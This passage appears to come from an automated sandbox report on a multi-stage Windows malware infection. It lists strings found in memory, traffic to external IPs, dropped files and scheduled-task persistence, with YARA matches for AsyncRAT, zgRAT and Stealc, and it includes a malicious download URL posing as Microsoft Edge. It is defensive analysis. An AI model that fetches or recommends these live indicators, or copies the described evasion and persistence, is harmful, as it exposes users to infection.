Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.000000000381B000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3376541999.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: stealc_default2.exe, 00000017.00000002.3105854817.0000000027513000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3442582690.000000002709F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: stealc_default2.exe, 00000017.00000002.3105854817.0000000027513000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3442582690.000000002709F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: penis.exe, 00000019.00000002.2964689421.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discord.com/api/v9/users/
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.000000000381B000.00000004.00000800.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3376541999.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: svchost015.exe, 0000001E.00000002.3376541999.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.000000000381B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabS
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.000000000381B000.00000004.00000800.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3376541999.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: axplong.exe, 00000006.00000002.3518419435.0000000000F15000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3518419435.0000000000E47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://eijfrhegrtbrfcd.online/
Source: axplong.exe, 00000006.00000002.3518419435.0000000000E47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://eijfrhegrtbrfcd.online/D9
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3526057863.0000000005960000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://eijfrhegrtbrfcd.online/download/Microsoft-Edge.exe
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://eijfrhegrtbrfcd.online/download/Microsoft-Edge.exe.exeP
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://eijfrhegrtbrfcd.online/download/Microsoft-Edge.exe789
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000000.2988347504.0000000000401000.00000020.00000001.01000000.00000019.sdmp String found in binary or memory: https://github.com/tesseract-ocr/tessdata/
Source: svchost015.exe, 0000001E.00000002.3442582690.000000002709F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: svchost015.exe, 0000001E.00000003.3250767941.000000002D132000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: svchost015.exe, 0000001E.00000003.3250767941.000000002D132000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: stealc_default2.exe, 00000017.00000002.3105854817.0000000027513000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3442582690.000000002709F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3376541999.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.000000000381B000.00000004.00000800.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3376541999.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: svchost015.exe, 0000001E.00000002.3324897526.00000000005AD000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: svchost015.exe, 0000001E.00000003.3250767941.000000002D132000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: svchost015.exe, 0000001E.00000002.3324897526.00000000005AD000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: svchost015.exe, 0000001E.00000002.3324897526.00000000005AD000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: svchost015.exe, 0000001E.00000003.3250767941.000000002D132000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: svchost015.exe, 0000001E.00000003.3250767941.000000002D132000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.ssl.com/repository0
Source: stealc_default2.exe, 00000017.00000002.3105854817.0000000027513000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3442582690.000000002709F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000000.2988347504.0000000000401000.00000020.00000001.01000000.00000019.sdmp String found in binary or memory: https://www.x-ways.net/forensics/x-tensions.html
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000000.2988347504.0000000000401000.00000020.00000001.01000000.00000019.sdmp String found in binary or memory: https://www.x-ways.net/forensics/x-tensions.htmlf
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000000.2988347504.0000000000401000.00000020.00000001.01000000.00000019.sdmp String found in binary or memory: https://www.x-ways.net/winhex/forum/
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000000.2988347504.0000000000401000.00000020.00000001.01000000.00000019.sdmp String found in binary or memory: https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protection
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49644
Source: unknown Network traffic detected: HTTP traffic on port 49647 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49673
Source: unknown Network traffic detected: HTTP traffic on port 49635 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49638 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49644 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49638
Source: unknown Network traffic detected: HTTP traffic on port 49646 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49647
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49635
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49646
Source: unknown HTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.6:49635 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.6:49638 version: TLS 1.2
Source: unknown HTTPS traffic detected: 37.140.192.213:443 -> 192.168.2.6:49644 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.194:443 -> 192.168.2.6:49646 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.194:443 -> 192.168.2.6:49647 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.194:443 -> 192.168.2.6:49673 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004F9000 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 16_2_004F9000
Source: penis.exe, 00000019.00000002.2964689421.00000000030EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: GetRawInputData memstr_f19ef452-d
Source: Yara match File source: 30.0.svchost015.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: needmoney.exe PID: 3360, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost015.exe PID: 5268, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\svchost015.exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File created: C:\Users\user\AppData\Local\Temp\TmpFBD.tmp Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\TmpA462.tmp Jump to dropped file
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe File created: C:\Users\user\AppData\Local\Temp\TmpB588.tmp Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\TmpFC46.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File created: C:\Users\user\AppData\Local\Temp\TmpFCE.tmp Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\TmpA451.tmp Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\TmpFC35.tmp Jump to dropped file
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe File created: C:\Users\user\AppData\Local\Temp\TmpB578.tmp Jump to dropped file

System Summary

Source: 25.0.penis.exe.ac0000.0.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 38.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 35.2.rstxdhuj.exe.38efdb0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 35.2.rstxdhuj.exe.38a1590.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000023.00000002.3231251960.00000000038A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000023.00000002.3116851630.0000000002971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000026.00000002.3514611255.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, type: DROPPED Matched rule: Detects zgRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\penis[1].exe, type: DROPPED Matched rule: Detects zgRAT Author: ditekSHen
Source: gold[1].exe.6.dr, MoveAngles.cs Large array initialization: MoveAngles: array initializer size 311296
Source: gold.exe.6.dr, MoveAngles.cs Large array initialization: MoveAngles: array initializer size 311296
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: .idata
Source: axplong.exe.0.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: c6f71c9f40.exe.6.dr Static PE information: section name:
Source: c6f71c9f40.exe.6.dr Static PE information: section name: .rsrc
Source: c6f71c9f40.exe.6.dr Static PE information: section name: .idata
Source: c6f71c9f40.exe.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: 3ab68b6f1f.exe.6.dr Static PE information: section name:
Source: 3ab68b6f1f.exe.6.dr Static PE information: section name: .idata
Source: 3ab68b6f1f.exe.6.dr Static PE information: section name:
Source: stealc_default2[1].exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: stealc_default2.exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\axplong.job
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe File created: C:\Windows\Tasks\Hkbsse.job
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Process token adjusted: Security
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: String function: 004CED80 appears 194 times
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: String function: 004CCAD0 appears 53 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00407D30 appears 55 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 644 -s 908
Source: Microsoft-Edge.exe.6.dr Static PE information: Number of sections : 18 > 10
Source: Microsoft-Edge[1].exe.6.dr Static PE information: Number of sections : 18 > 10
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 25.0.penis.exe.ac0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 38.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 35.2.rstxdhuj.exe.38efdb0.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 35.2.rstxdhuj.exe.38a1590.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000023.00000002.3231251960.00000000038A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000023.00000002.3116851630.0000000002971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000026.00000002.3514611255.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, type: DROPPED Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\penis[1].exe, type: DROPPED Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: gold[1].exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: gold.exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 12dsvc[1].exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 12dsvc.exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe Static PE information: Section: ZLIB complexity 0.9970729734332425
Source: file.exe Static PE information: Section: tutljgzd ZLIB complexity 0.994399084512231
Source: axplong.exe.0.dr Static PE information: Section: ZLIB complexity 0.9970729734332425
Source: axplong.exe.0.dr Static PE information: Section: tutljgzd ZLIB complexity 0.994399084512231
Source: random[1].exe.6.dr Static PE information: Section: llbyxbem ZLIB complexity 0.9949982080354484
Source: c6f71c9f40.exe.6.dr Static PE information: Section: llbyxbem ZLIB complexity 0.9949982080354484
Source: random[1].exe0.6.dr Static PE information: Section: ZLIB complexity 0.9983502213896458
Source: random[1].exe0.6.dr Static PE information: Section: xmjcxhmw ZLIB complexity 0.9945782643016344
Source: 3ab68b6f1f.exe.6.dr Static PE information: Section: ZLIB complexity 0.9983502213896458
Source: 3ab68b6f1f.exe.6.dr Static PE information: Section: xmjcxhmw ZLIB complexity 0.9945782643016344
Source: axplong.exe.0.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: file.exe Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@60/100@15/16
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004F81AA CoCreateInstance, 16_2_004F81AA
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\gold[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6868:64:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5020:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Mutant created: \Sessions\1\BaseNamedObjects\07c6bc37dc50874878dcb010336ed906
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3520:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: \Sessions\1\BaseNamedObjects\TSXTkO0pNBdN2KNw
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3208:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49
Source: Yara match File source: 30.0.svchost015.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001E.00000000.2988347504.0000000000401000.00000020.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\svchost015.exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select Name from Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: stealc_default2.exe, 00000017.00000002.3114439180.000000006974F000.00000002.00000001.01000000.0000001B.sdmp, stealc_default2.exe, 00000017.00000002.3087042883.000000001B497000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000002.3113444238.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3457891748.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3468864393.00000000690BF000.00000002.00000001.01000000.0000001B.sdmp, svchost015.exe, 0000001E.00000002.3426007293.000000001B02A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: stealc_default2.exe, 00000017.00000002.3114439180.000000006974F000.00000002.00000001.01000000.0000001B.sdmp, stealc_default2.exe, 00000017.00000002.3087042883.000000001B497000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000002.3113444238.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3457891748.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3468864393.00000000690BF000.00000002.00000001.01000000.0000001B.sdmp, svchost015.exe, 0000001E.00000002.3426007293.000000001B02A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: stealc_default2.exe, 00000017.00000002.3114439180.000000006974F000.00000002.00000001.01000000.0000001B.sdmp, stealc_default2.exe, 00000017.00000002.3087042883.000000001B497000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000002.3113444238.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3457891748.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3468864393.00000000690BF000.00000002.00000001.01000000.0000001B.sdmp, svchost015.exe, 0000001E.00000002.3426007293.000000001B02A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: stealc_default2.exe, 00000017.00000002.3114439180.000000006974F000.00000002.00000001.01000000.0000001B.sdmp, stealc_default2.exe, 00000017.00000002.3087042883.000000001B497000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000002.3113444238.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3457891748.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3468864393.00000000690BF000.00000002.00000001.01000000.0000001B.sdmp, svchost015.exe, 0000001E.00000002.3426007293.000000001B02A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: stealc_default2.exe, 00000017.00000002.3114439180.000000006974F000.00000002.00000001.01000000.0000001B.sdmp, stealc_default2.exe, 00000017.00000002.3087042883.000000001B497000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000002.3113444238.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3457891748.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3468864393.00000000690BF000.00000002.00000001.01000000.0000001B.sdmp, svchost015.exe, 0000001E.00000002.3426007293.000000001B02A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: stealc_default2.exe, 00000017.00000002.3114439180.000000006974F000.00000002.00000001.01000000.0000001B.sdmp, stealc_default2.exe, 00000017.00000002.3087042883.000000001B497000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000002.3113444238.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3457891748.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3468864393.00000000690BF000.00000002.00000001.01000000.0000001B.sdmp, svchost015.exe, 0000001E.00000002.3426007293.000000001B02A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: stealc_default2.exe, 00000017.00000002.3087042883.000000001B497000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000002.3113444238.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3457891748.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3426007293.000000001B02A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
